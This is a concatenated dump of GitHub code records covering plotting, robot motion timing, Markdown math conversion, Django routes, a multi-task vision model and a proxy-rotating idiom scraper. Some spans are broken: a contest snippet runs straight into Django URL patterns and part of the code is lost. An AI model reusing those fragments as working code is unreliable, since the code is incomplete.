highs, c='red', alpha=0.7)\nax.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)\n\nax.set_title(\"Daily high and low temperatures - 2018 (Sitka)\", fontsize=24)\nfig.autofmt_xdate()\nax.set_ylabel(\"Temperature (F)\", fontsize=16)\nax.tick_params(axis='both', labelsize=12)\n\nplt.show()\n\n\n","repo_name":"HaiseX7/Data-Visualization","sub_path":"sitka_highs_lows.py","file_name":"sitka_highs_lows.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2647874144","text":"from CustomModules import global_vars\nimport numpy as np\nimport math\n\n\nclass TimeCalculations:\n \"\"\"\n This class calculates the needed time to pass a sub frame by using user inputs and classic physics.\n \"\"\"\n \n max_speed = global_vars.MAX_SPEED_IN_METERS # Max speed that an end effector can have.\n min_speed = global_vars.MIN_SPEED_IN_METERS # Min speed that an end effector can have.\n max_acceleration = global_vars.MAX_ACCLERATION # Max acceleration that an end effector can have.\n min_acceleration = global_vars.MIN_ACCLERATION # Min acceleration that an end effector can have.\n\n def __init__(self):\n self.start_velocity = float(0) # Start velocity of frame\n self.end_velocity = float(0) # End velocity of frame\n self.acceleration = float(0) # Acceleration within a frame\n self.total_length_of_spline_part = float(0) # Total path length of frame\n self.total_time_passed = float(0) # Time passed till stated point\n self.delta_t = float(0) # Time for stated user inputted frame\n self.total_spline = float(0) # Total path length passed till stated point\n self.i = 1 # Counter for calcuations \n \n self.k = 1 # Counter for calcuations \n self.g = 0 # Counter for calcuations \n self.m = 1 # Counter for calcuations \n \n self.average_speeds_of_frames = [] # Average speed within a user inputted frame\n self.times_of_intervals = [] # Time values for sub-frames\n self.velocities = [] # List of velocities\n self.start_velocities = [] # List of frames' start velocities\n self.accelerations = [] # List of accelerations within frames \n self.end_velocities = [] # List of end velocities\n self.times_and_velocities_for_end_effector = [] # Returning list of calculated frame times and velocities\n \n def calculating_average_end_effector_speed(self, list_position, time_vs_u,xs,zs):\n \"\"\"\n Calculating the average speed within frames. Average speed values are used in end_velocity calculations for double acceleration frames.\n\n Parameter\n ---------\n list_positions : list type\n List of list indexes for user inputted frames after populated spline.\n\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n xs : list type\n List of x values corresponding to the divided path values values\n\n zs : list type\n List of z values corresponding to the divided path values values\n\n Returns\n -------\n self.average_speeds_of_frames : list type\n Average speed within a user inputted frame\n \n Errors\n ------\n Error_Type: 101 \n Max speed limit is exceeding please increase the frame time\n \"\"\"\n \n a = 0\n b = 1\n frame = -1\n for pos in list_position:\n frame += 1\n length_of_spline_part = 0\n if a == 0:\n a += 1\n pass\n else:\n while a < (pos+1) and (a-1) < list_position[-1]:\n temp_length_of_small_piece = ( (xs[a]-xs[a-1])**2 + (zs[a]-zs[a-1])**2 )**0.5\n length_of_spline_part += temp_length_of_small_piece\n a += 1\n frame_time = time_vs_u[b][0] - time_vs_u[b-1][0]\n average_speed_in_frame = length_of_spline_part / frame_time\n b += 1\n if average_speed_in_frame > self.max_speed:\n raise ValueError (f\"Error_Type=101,Frame={frame}\")\n \n self.average_speeds_of_frames.append(average_speed_in_frame)\n del a\n del b\n del length_of_spline_part\n del average_speed_in_frame\n\n return self.average_speeds_of_frames\n \n def solving_with_jerk_control(self,pos,list_position, end_velocity,time_vs_u,xs,zs):\n \"\"\"\n Calculating acceleration and velocities to solve the inputted frame by using jerk calculation method\n #TODO: jerk calculation methodun açıklama linki eklenecek.\n Parameter\n ---------\n pos : integer type\n List index corresponding to the user inputted frame within all sub frames\n\n list_positions : list type\n List of list indexes for user inputted frames after populated spline.\n\n end_velocity : float type\n End velocity of the frame which is calculating. \n\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n xs : list type\n List of x values corresponding to the divided path values values.\n\n zs : list type\n List of z values corresponding to the divided path values values.\n\n Returns\n -------\n self.times_and_velocities_for_end_effector : list type\n Returning list of calculated frame times and velocities.\n \n Errors\n ------\n Error_Type: 101 \n Max speed limit is exceeding please increase the frame time\n Error_Type: 102 \n Max speed limit is exceeding please increase the frame time\n Error_Type: 103\n There are no real roots to compute this frame's velocties.\n \"\"\"\n \n \n self.total_length_of_spline_part = float(0)\n # First we fing the length of spline\n while self.m < (pos+1) and (self.m-1) < list_position[-1]:\n length_of_small_piece = ( (xs[self.m]-xs[self.m-1])**2 + (zs[self.m]-zs[self.m-1])**2 )**0.5 \n self.total_length_of_spline_part += length_of_small_piece\n self.m += 1\n self.total_spline += self.total_length_of_spline_part\n self.delta_t = time_vs_u[self.i][0] - time_vs_u[self.i-1][0]\n \n\n # Acceleration is written as a = b * t + c\n # a = acceleration\n # b = b_element\n # c = c_element\n # Finding velocity and location by integrating acceleration\n # end_velocity = b * t^2 / 2 + c * t + start_velocity\n # location = (b * t^3)/6 +(c * t^2)/2 + start_velocity * t\n # Using the equations above we found c_element and b_element as below:\n self.end_velocity = end_velocity\n c_element = (self.total_length_of_spline_part - self.end_velocity * self.delta_t/3 - 2 * self.start_velocity * self.delta_t /3)/((self.delta_t**2)/6)\n b_element = (self.end_velocity - self.start_velocity - c_element * self.delta_t)/((self.delta_t**2) / 2)\n \n \n velocity = self.start_velocity\n time_at_sub_frame = 0\n length_of_intervals = []\n all_roots = []\n total_length = 0\n old_velocity = velocity\n\n while self.k < (pos + 1) and (self.k-1) < list_position[-1]:\n length_of_interval = ( (xs[self.k]-xs[self.k-1])**2 + (zs[self.k]-zs[self.k-1])**2 )**0.5\n length_of_intervals.append(length_of_interval)\n total_length += length_of_interval\n # Solving time for each length of interval means solving 3. degree equation derived from definite integral:\n # location = (b * t^3)/6 +(c * t^2)/2 + start_velocity * t\n\n coef1 = b_element / 6\n coef2 = c_element / 2\n coef3 = self.start_velocity\n coef4 = -total_length\n np_coefs = [coef1,coef2,coef3,coef4]\n roots = np.roots(np_coefs)\n all_roots.append(roots)\n temp =[]\n for root in roots:\n if root > 0 and abs(np.imag(root))<0.0001 :\n temp2 = np.real(root)\n temp.append(temp2)\n if len(temp) == 1:\n time_at_sub_frame = temp[0]\n elif len(temp) >= 2:\n if time_at_sub_frame > min(temp):\n time_at_sub_frame = max(temp)\n else:\n time_at_sub_frame = min(temp)\n else:\n raise ValueError (f\"Error_Type=104,Frame={self.i}\")\n del temp2\n np_coefs.clear()\n temp.clear()\n \n # Solving velocity as a definite integral\n velocity = self.start_velocity + b_element * (time_at_sub_frame**2) /2 + c_element * (time_at_sub_frame)\n # Controlling maximum velocity and acceleration\n control_acceleration = (velocity - old_velocity) / self.delta_t\n if abs(control_acceleration) > self.max_acceleration:\n raise ValueError (f\"Error_Type=102,Frame={self.i}\")\n if abs(velocity) > self.max_speed:\n raise ValueError (f\"Error_Type=103,Frame={self.i}\")\n \n self.times_of_intervals.append(self.total_time_passed + time_at_sub_frame)\n self.velocities.append(velocity)\n self.k += 1\n old_velocity = velocity\n \n self.total_time_passed += time_at_sub_frame\n\n self.start_velocity = velocity\n \n \n \n \n if abs(velocity - self.end_velocity)<0.001:\n print(\"Velocities are same as calculated at the end-- double_acceleration_within_a_frame in TimeCalculations class\")\n else:\n print(\"There is something wrong with the velocities-- double_acceleration_within_a_frame in TimeCalculations class\")\n \n if len(self.velocities) == len(self.times_of_intervals):\n while self.g < len(self.velocities):\n self.times_and_velocities_for_end_effector.append((self.times_of_intervals[self.g],self.velocities[self.g]))\n self.g += 1\n else:\n print(\"There is something wrong with the length of time arrivals-- double_acceleration_within_a_frame in TimeCalculations class\")\n self.i += 1\n \n del old_velocity\n del velocity\n del b_element\n del c_element\n del np_coefs\n del coef1\n del coef2\n del coef3\n del coef4\n del temp\n del root\n del roots\n del all_roots\n \n return self.times_and_velocities_for_end_effector \n \n def stopped_frame(self,time_vs_u):\n \"\"\"\n Importing stopped frames as frames into the list self.times_and_velocities_for_end_effector\n\n Parameters\n ----------\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n Returns\n -------\n self.times_and_velocities_for_end_effector : list type\n Returning list of calculated frame times and velocities\n\n \"\"\"\n self.delta_t = time_vs_u[self.i][0] - time_vs_u[self.i-1][0]\n self.total_time_passed += self.delta_t\n self.times_of_intervals.append(self.total_time_passed)\n self.velocities.append(0)\n \n if self.g == 0:\n self.g = 2\n else: \n self.g += 1\n self.i += 1\n self.times_and_velocities_for_end_effector.append((self.times_of_intervals[-1],\"stop\"))\n \n print(\"Stopped Frame calculated\")\n return self.times_and_velocities_for_end_effector\n \n def zeroth_frame(self):\n \"\"\"\n Adding needed values of time and velocities to the lists \"self.times_of_intervals\" and \"self.velocities\" for starting point\n \"\"\"\n self.times_of_intervals.append(float(0))\n self.velocities.append(float(0))","repo_name":"Levitate-Git/g-petto-commandGenerator","sub_path":"Smoothing_Modules/time_calculation.py","file_name":"time_calculation.py","file_ext":"py","file_size_in_byte":12258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73649809216","text":"import re\n\n# 3rd party\nimport markdown.postprocessors\n\n# this package\nfrom py2latex.markdown_parser.utils import unescape_latex_entities\n\n__all__ = [\"MathTextPostProcessor\"]\n\n\nclass MathTextPostProcessor(markdown.postprocessors.Postprocessor):\n\n\tdef run(self, instr):\n\t\t\"\"\"\n\t\tConvert all math sections in {text} whether LaTeX, asciimathml or latexmathml formatted to LaTeX.\n\n\t\tThis assumes you are using $ for inline math and ``$$`` for blocks as your mathematics delimiter\n\t\t(*not* the standard asciimathml or latexmathml delimiter).\n\t\t\"\"\"\n\n\t\tdef repl_1(matchobj) -> str:\n\t\t\t\"\"\"\n\n\t\t\t:param matchobj:\n\t\t\t:type matchobj:\n\n\t\t\t:return:\n\t\t\t:rtype: str\n\t\t\t\"\"\"\n\n\t\t\ttext = unescape_latex_entities(matchobj.group(1))\n\t\t\treturn f\"\\\\[{text}\\\\]\"\n\n\t\tdef repl_2(matchobj) -> str:\n\t\t\t\"\"\"\n\n\t\t\t:param matchobj:\n\t\t\t\"\"\"\n\n\t\t\ttext = unescape_latex_entities(matchobj.group(1))\n\t\t\treturn f\"\\\\({text}\\\\)\"\n\n\t\t# This $$x=3$$ is block math\n\t\tpat = re.compile(r\"\\$\\$([^$]*)\\$\\$\")\n\t\tout = pat.sub(repl_1, instr)\n\n\t\t# This $x=3$ is inline math\n\t\tpat2 = re.compile(r\"\\$([^$]*)\\$\")\n\t\tout = pat2.sub(repl_2, out)\n\n\t\t# some extras due to asciimathml\n\t\tout = out.replace(\"\\\\lt\", '<')\n\t\tout = out.replace(\" * \", \" \\\\cdot \")\n\t\tout = out.replace(\"\\\\del\", \"\\\\partial\")\n\n\t\treturn out\n","repo_name":"domdfcoding/py2latex","sub_path":"py2latex/markdown_parser/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70889209857","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: yapan liu (su)\n\"\"\"\n\nimport pandas as pd\n\n# pull the information of the dataset which is used to train the model\ndef datasetInfo(dataset_id, ob_type):\n # id: the id of the dataset from ASHRAE OB database\n # df = pd.read_excel('./Models/all_studies_info_simplified.xlsx') \n # df.to_parquet('./Models/all_studies_info_simplified.parquet', engine='pyarrow')\n \n # read from the parquet file\n df = pd.read_parquet('./Models/all_studies_info_simplified.parquet', engine='pyarrow')\n \n # select the data based on the dataset id and the behavior type\n df_select = df[(df['Study ID'] == dataset_id) & (df['Behavior Type'] == ob_type)].copy()\n df_select.set_index('Study ID', inplace=True)\n \n return df_select \n\n# crop the white region of the image in linux: \"convert -trim input.jpg output.jpg\"\n\n# pull the model contributor information\ndef modelContributor(behavior_type, model_name):\n df = pd.read_csv(\"./Models/Model_Info.csv\")\n df.replace(r'\\n', '; ', regex=True, inplace=True)\n contributor_columns = [\"Contributor\", \"Affiliation\",\"Dataset\", \"Related_Publication\"]\n model_info_columns = [\"Behavior_Type\",\"Model_Name\",\"Model_Type\",\"Model_Details\",\"Model_Input\",\"Model_Output\",\"Model_Training\",\"Model_Testing\"]\n \n # model contributor information\n df_contributor = df.loc[(df['Behavior_Type'] == behavior_type) & (df['Model_Name'] == model_name), contributor_columns].copy()\n df_contributor = df_contributor.T\n df_contributor.columns = ['Information']\n \n # model information\n df_model = df.loc[(df['Behavior_Type'] == behavior_type) & (df['Model_Name'] == model_name), model_info_columns].copy()\n df_model = df_model.T\n df_model.columns = ['Information']\n \n # replace _ with space in the columns and index names\n df_model.replace('_', ' ', regex=True, inplace=True)\n df_model.index = df_model.index.str.replace('_', ' ', regex=True)\n \n df_contributor.replace('_', ' ', regex=True, inplace=True)\n df_contributor.index = df_contributor.index.str.replace('_', ' ', regex=True)\n \n return df_model, df_contributor\n \n \n\nif __name__ == \"__main__\":\n \n # dataset_id = 26\n # ob_type = \"Window_Status\"\n # datasetInfo(dataset_id, ob_type)\n \n # data_path = './Models/Window_Status/SVM_E3D/'\n df_model, df_contributor = modelContributor(behavior_type='Window_Status', model_name='SVM_E3D')\n print(df_model)\n print(df_contributor)\n print(\"\")\n\n","repo_name":"yapanliu/OBlib","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"40313394024","text":"\"\"\"\nThis example demonstrates a call to rocketunits.convert_value\n\"\"\"\nfrom rocketunits.rocket_units import convert_value\n\ndef disp( val, inp_units, out_units ):\n # use convert_value to convert inp_units to out_units\n ans = convert_value(val, inp_units, out_units)\n \n print( f'{val} {inp_units} = {ans} {out_units}' )\n\n# convert_value gives the following output\n\ndisp( 180, 'deg', 'rad' ) # ==> 180 deg = 3.1415926535820002 rad\n\ndisp( 100, 'rpm', 'deg/s' ) # ==> 100 rpm = 600.0 deg/s\n\ndisp( 1, 'lbm/in**3', 'g/ml' ) # ==> 1 lbm/in**3 = 27.6799047102 g/ml\n","repo_name":"sonofeft/RocketUnits","sub_path":"rocketunits/examples/example_1.py","file_name":"example_1.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38602946686","text":"t = int(input())\nx = 1\nwhile x<=t:\n n = int(input())\n filas = []\n columnas = []\n for i in range(0,n):\n filas.append(set())\n columnas.append(set())\n total=0\n for i in range(0,n):\n line=input().split()\n for j in range(0,n):\n m = int(line[j])\n if i==j:\n total+=m\n filas[i].add(m)\n columnas[j].add(m)\n f=0\n c=0\n for fila in filas:\n if len(fila) None:\n super().__init__()\n backbone_net = build_backbone(\n backbone, detector, segmentor, kwargs)\n attention_ch = kwargs['attention_channels']\n self.task_per_dset = kwargs['task_per_dset']\n \n self.shared_layer1_b = backbone_net.body.layer1[:-1] \n self.shared_layer1_t = backbone_net.body.layer1[-1]\n\n self.shared_layer2_b = backbone_net.body.layer2[:-1]\n self.shared_layer2_t = backbone_net.body.layer2[-1]\n\n self.shared_layer3_b = backbone_net.body.layer3[:-1]\n self.shared_layer3_t = backbone_net.body.layer3[-1]\n\n self.shared_layer4_b = backbone_net.body.layer4[:-1]\n self.shared_layer4_t = backbone_net.body.layer4[-1]\n \n self.fpn = backbone_net.fpn\n \n self.stem_dict = nn.ModuleDict()\n self.head_dict = nn.ModuleDict()\n \n stem_weight = kwargs['state_dict']['stem']\n for data, cfg in task_cfg.items():\n task = cfg['task']\n num_classes = cfg['num_classes']\n \n if task == 'clf':\n stem = ClfStem(**cfg['stem'])\n head = build_classifier(\n backbone, num_classes, cfg['head'])\n stem.apply(init_weights)\n \n \n elif task == 'det':\n stem = DetStem(**cfg['stem'])\n \n head_kwargs = {'num_anchors': len(backbone_net.body.return_layers)+1}\n head = build_detector(\n backbone, detector, \n backbone_net.fpn_out_channels, num_classes, **head_kwargs)\n if stem_weight is not None:\n ckpt = torch.load(stem_weight)\n stem.load_state_dict(ckpt, strict=False)\n print(\"!!!Load weights for detection stem layer!!!\")\n \n # stem = DetStem()\n # head = build_detector(detector, backbone.fpn_out_channels, \n # cfg['num_classes'])\n # if stem_weight is not None:\n # ckpt = torch.load(stem_weight)\n # stem.load_state_dict(ckpt)\n \n elif task == 'seg':\n stem = SegStem(**cfg['stem'])\n head = build_segmentor(segmentor, num_classes=num_classes, cfg_dict=cfg['head'])\n if stem_weight is not None:\n ckpt = torch.load(stem_weight)\n stem.load_state_dict(ckpt, strict=False)\n print(\"!!!Load weights for segmentation stem layer!!!\")\n \n # stem = SegStem(**cfg['stem'])\n # head = build_segmentor(segmentor, cfg['head'])\n # if stem_weight is not None:\n # ckpt = torch.load(stem_weight)\n # stem.load_state_dict(ckpt)\n \n head.apply(init_weights)\n self.stem_dict.update({data: stem})\n self.head_dict.update({data: head})\n \n self.down_sampling = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\n \n self.att_encoder1 = nn.ModuleDict({k: self.att_layer(attention_ch[0], attention_ch[0]//4, attention_ch[0]) for k in task_cfg.keys()})\n self.att_encoder2 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[1], attention_ch[1]//4, attention_ch[1]) for k in task_cfg.keys()})\n self.att_encoder3 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[2], attention_ch[2]//4, attention_ch[2]) for k in task_cfg.keys()})\n self.att_encoder4 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[3], attention_ch[3]//4, attention_ch[3]) for k in task_cfg.keys()})\n \n self.encoder_block_att1 = self.att_block_layer(attention_ch[0], attention_ch[1] // 4)\n self.encoder_block_att2 = self.att_block_layer(attention_ch[1], attention_ch[2] // 4)\n self.encoder_block_att3 = self.att_block_layer(attention_ch[2], attention_ch[3] // 4)\n \n \n def att_layer(self, in_channel, intermediate_channel, out_channel):\n return nn.Sequential(\n nn.Conv2d(in_channels=in_channel, out_channels=intermediate_channel, kernel_size=1, padding=0),\n nn.BatchNorm2d(intermediate_channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels=intermediate_channel, out_channels=out_channel, kernel_size=1, padding=0),\n nn.BatchNorm2d(out_channel),\n nn.Sigmoid())\n \n\n def att_block_layer(self, in_channel, out_channel):\n downsample = nn.Sequential(conv1x1(in_channel, 4 * out_channel, stride=1),\n nn.BatchNorm2d(4 * out_channel))\n return Bottleneck(in_channel, out_channel, downsample=downsample)\n\n \n def _generate_features(self, data_dict, tasks):\n mode = 'train' if self.training else 'val'\n det_feats = OrderedDict()\n seg_feats = OrderedDict()\n \n # ttt = True if 'voc' in data_dict else False\n \n stem_feats = OrderedDict(\n {dset: self.stem_dict[dset](data[0]) for dset, data in data_dict.items()}\n )\n \n shared_backbone_feat1 = OrderedDict(\n {dset: self.shared_layer1_b(data) for dset, data in stem_feats.items()}\n )\n shared_last_feat1 = OrderedDict(\n {dset: self.shared_layer1_t(data) for dset, data in shared_backbone_feat1.items()}\n )\n \n shared_backbone_feat2 = OrderedDict(\n {dset: self.shared_layer2_b(data) for dset, data in shared_last_feat1.items()}\n )\n shared_last_feat2 = OrderedDict(\n {dset: self.shared_layer2_t(data) for dset, data in shared_backbone_feat2.items()}\n )\n \n shared_backbone_feat3 = OrderedDict(\n {dset: self.shared_layer3_b(data) for dset, data in shared_last_feat2.items()}\n )\n shared_last_feat3 = OrderedDict(\n {dset: self.shared_layer3_t(data) for dset, data in shared_backbone_feat3.items()}\n )\n \n shared_backbone_feat4 = OrderedDict(\n {dset: self.shared_layer4_b(data) for dset, data in shared_last_feat3.items()}\n )\n shared_last_feat4 = OrderedDict(\n {dset: self.shared_layer4_t(data) for dset, data in shared_backbone_feat4.items()}\n ) \n \n a_1_mask = {dset: self.att_encoder1[dset](back_feat) for dset, back_feat in shared_backbone_feat1.items()} \n a_1 = {dset: a_1_mask_i * shared_last_feat1[dset] for dset, a_1_mask_i in a_1_mask.items()} \n det_feats.update({'0': f for t, f in a_1.items() if self.task_per_dset[t] == 'det'})\n a_1 = {dset: self.down_sampling(self.encoder_block_att1(a_1_i)) for dset, a_1_i in a_1.items()}\n \n \n a_2_mask = {dset: self.att_encoder2[dset](torch.cat(\n (back_feat, a_1[dset]), dim=1)) for dset, back_feat in shared_backbone_feat2.items()} \n a_2 = {dset: a_2_mask_i * shared_last_feat2[dset] for dset, a_2_mask_i in a_2_mask.items()} \n det_feats.update({'1': f for t, f in a_2.items() if self.task_per_dset[t] == 'det'})\n a_2 = {dset: self.down_sampling(self.encoder_block_att2(a_2_i)) for dset, a_2_i in a_2.items()}\n \n \n a_3_mask = {dset: self.att_encoder3[dset](torch.cat(\n (back_feat, a_2[dset]), dim=1)) for dset, back_feat in shared_backbone_feat3.items()} \n a_3 = {dset: a_3_mask_i * shared_last_feat3[dset] for dset, a_3_mask_i in a_3_mask.items()} \n det_feats.update({'2': f for t, f in a_3.items() if self.task_per_dset[t] == 'det'})\n seg_feats.update({'2': f for t, f in a_3.items() if self.task_per_dset[t] == 'seg'})\n a_3 = {dset: self.encoder_block_att3(a_3_i) for dset, a_3_i in a_3.items()}\n \n a_4_mask = {dset: self.att_encoder4[dset](torch.cat(\n (back_feat, a_3[dset]), dim=1)) for dset, back_feat in shared_backbone_feat4.items()} \n a_4 = {dset: a_4_mask_i * shared_last_feat4[dset] for dset, a_4_mask_i in a_4_mask.items()} \n det_feats.update({'3': f for t, f in a_4.items() if self.task_per_dset[t] == 'det'})\n seg_feats.update({'3': f for t, f in a_4.items() if self.task_per_dset[t] == 'seg'})\n \n total_losses = OrderedDict()\n \n for dset, att_feats in a_4.items():\n task = tasks[dset]\n head = self.head_dict[dset]\n targets = data_dict[dset][1]\n \n if task == 'clf':\n out = head(att_feats, targets)\n \n if mode == 'val':\n return dict(outputs=out)\n \n elif task == 'det':\n fpn_feats = self.fpn(det_feats)\n \n out = head(data_dict[dset][0], fpn_feats, \n origin_targets=targets, \n trs_fn=self.stem_dict[dset].transform)\n \n if mode == 'val':\n return out\n \n elif task == 'seg':\n out = head(\n seg_feats, targets, input_shape=data_dict[dset][0].shape[-2:])\n \n if mode == 'val':\n return dict(outputs=out)\n \n total_losses.update({f\"{dset}_{k}\": l for k, l in out.items()})\n \n return total_losses\n \n \n def forward(self, data_dict, kwargs):\n if not self.training:\n if not hasattr(data_dict, 'items'):\n data_dict = {list(kwargs.keys())[0]: [data_dict, None]}\n \n return self._generate_features(data_dict, kwargs)\n \n\n \n \n","repo_name":"kcs6568/mtl","sub_path":"lib/model_api/task_model/mtan_resnet.py","file_name":"mtan_resnet.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72023697534","text":"import sys\nfrom typing import List\n\ndef maxProfit_brute_force(prices: List[int]) -> int:\n max_price = 0\n\n for i, price in enumerate(prices):\n for j in range(i, len(prices)):\n max_price = max(prices[j] - price, max_price)\n\n return max_price\n\ndef maxProfit_Kadanes(prices: List[int]) -> int:\n max_profit = 0\n min_price = sys.maxsize\n\n for price in prices:\n min_price = min(min_price, price)\n max_profit = max(max_profit, price - min_price)\n\n return max_profit\n\n\ndef test_case():\n case1 = [7, 1, 5, 3, 6, 4]\n\n result1 = maxProfit_brute_force(case1)\n print(result1)\n\n result2 = maxProfit_Kadanes(case1)\n print(result2)","repo_name":"daesookimds/Algorithm","sub_path":"linear_data_structure/best_time_to_buy_and_sell_stock.py","file_name":"best_time_to_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70416948735","text":"testcase=int(input())\ncnt=0\nans=[]\nwhile cnt[0-9]+)/searchrestaurants/$', views.searchrestaurants, name='searchrestaurants'),\n url(r'^(?P[0-9]+)/pickrestaurants/$', views.pickrestaurants, name='pickrestaurants'),\n url(r'^(?P[0-9]+)/responses/$', views.responses, name='responses'),\n url(r'^(?P[0-9]+)/recommendation/$', views.recommendation, name='recommendation'), \n url(r'^(?P[0-9]+)/rejection/$', views.rejection, name='rejection'),\n url(r'^(?P[0-9]+)/thankyou/$', views.thankyou, name='thankyou')\n\n]\n\n","repo_name":"emily03196/cereal-killers","sub_path":"django/cerealkillers/pandora/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32721008739","text":"import os\nimport random\nimport requests\nimport threading\nimport time\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\n\nwork_dir = os.getcwd()\nproject_dir = os.path.split(work_dir)[0]\n\nip_pool = [\"124.94.253.104:9999\", \"175.43.179.146:9999\", \"123.101.207.99:9999\", \"123.163.116.170:9999\",\n \"123.52.96.63:9999\", \"114.102.6.8:9999\", \"125.123.153.177:3000\", \"123.54.40.143:9999\", \"59.50.26.216:32676\",\n \"123.169.124.234:9999\", \"122.4.44.54:41007\", \"110.243.13.134:9999\", \"123.169.117.241:9999\",\n \"42.59.100.6:9999\", \"171.11.59.110:9999\"]\n\nall_idioms = []\nfail_urls = []\ncrawded_urls = []\n\nclass myWorm(threading.Thread):\n def __init__(self, id=0, headers=None, idiom_urls=None):\n\n super(myWorm, self).__init__()\n\n self.id = id\n self.idiom_urls = idiom_urls\n self.headers = headers\n\n def clearErrorLogOl(self):\n with open(project_dir + '/log/{}_errorLog'.format(self.id), 'w', encoding='utf-8') as fp:\n fp.write('\\n')\n\n def writeLog(self, str):\n with open(project_dir + '/log/myLog_{}_V2.log'.format(self.id), 'a', encoding='utf-8') as fp:\n fp.write(str)\n fp.write('\\n')\n\n def writeErrorLogOl(self, str):\n with open(project_dir + '/log/{}_errorLog'.format(self.id), 'a', encoding='utf-8') as fp:\n fp.write(str)\n fp.write('\\n')\n\n def requestsUrl(self, url):\n failcount = 0\n ip = ip_pool[random.randrange(0, len(ip_pool))]\n proxy = {'HTTP': ip}\n while True:\n try:\n response = requests.get(url, headers=self.headers, proxies=proxy, timeout=10)\n except:\n self.writeErrorLogOl('wormID:{} crawling current url:{}:'\n 'can not request'.format(self.id, url))\n else:\n if response.status_code == 200:\n return response\n else:\n failcount += 1\n if failcount > 10:\n return []\n else:\n continue\n\n def get_idiom(self):\n global fail_count\n idiom_urls = self.idiom_urls\n global LinksNum\n while idiom_urls:\n url = idiom_urls.pop(0)\n if url in fail_urls:\n continue\n response = self.requestsUrl(url)\n if response:\n try:\n response.encoding = \"gbk\"\n soup = BeautifulSoup(response.text, 'lxml')\n td = soup.find('td', valign=\"top\")\n texts = td.find('font', color=\"#000000\").text.replace(\"\\r\", \"\").replace(\"\\t\", \"\").split(\"\\n\")\n fields = [\"成语\", \"拼音\", \"出处\", \"举例造句\", \"近义词\", \"反义词\", \"英文\", \"故事\", \"解释\"]\n cur_idiom = {}\n for item in texts:\n if item != \"\":\n splits = [it.strip() for it in item.split(\":\")]\n left = splits.pop(0).replace(\"【\", \"\").replace(\"】\", \"\")\n right = \":\".join(splits)\n if left in fields:\n cur_idiom[left] = right\n all_idioms.append(cur_idiom)\n crawded_urls.append(url)\n print('wormID:{} crawling current url:{}'\n '\\n\\tsuccessfully\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n div = soup.find('div', style=\"margin-left: 6px;line-height: 180%\")\n for tag in div.childGenerator():\n if isinstance(tag, Tag):\n if tag.text == \"成语分类导航:\":\n break\n if tag.get(\"href\", 0) != 0:\n link = tag.get(\"href\").replace(\"..\", \"http://www.hydcd.com/cy\")\n if link not in crawded_urls:\n idiom_urls.append(link)\n idiom_urls = list(set(idiom_urls))\n except:\n print('wormID:{} crawling current url:{}:'\n '\\n\\tfail\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n fail_urls.append(url)\n else:\n print('wormID:{} crawling current url:{}'\n '\\n\\tcan not get current link response\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n self.writeLog('wormID:{} crawling current url:{}:'\n 'can not get current link response'.format(self.id, url))\n fail_urls.append(url)\n\n def run(self):\n self.get_idiom()\n\n\ndef get_idioms(headers=None, wormNum=30):\n global LinksNum\n with open(project_dir + \"/data/hydcd_idiom_urls.txt\", \"r\") as fin:\n text = fin.read()\n idiom_urls = text.split(\" \")\n LinksNum = len(idiom_urls)\n worm_pool = []\n for i in range(wormNum):\n curWorm = myWorm(id=i+1, headers=headers, idiom_urls=idiom_urls)\n worm_pool.append(curWorm)\n for curWorm in worm_pool:\n curWorm.start()\n time.sleep(2)\n for curWorm in worm_pool:\n curWorm.join()\n\n print(\"成功爬取{}条\".format(len(all_idioms)))\n print(\"失败爬取{}条\".format(len(fail_urls)))\n with open(project_dir + \"/data/hydcd_idioms.txt\", \"w\", encoding=\"utf-8\") as fout:\n for idiom in all_idioms:\n fout.write(str(idiom) + \"\\n\")\n\n\nif __name__ == '__main__':\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n # 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n }\n\n get_idioms(headers=headers, 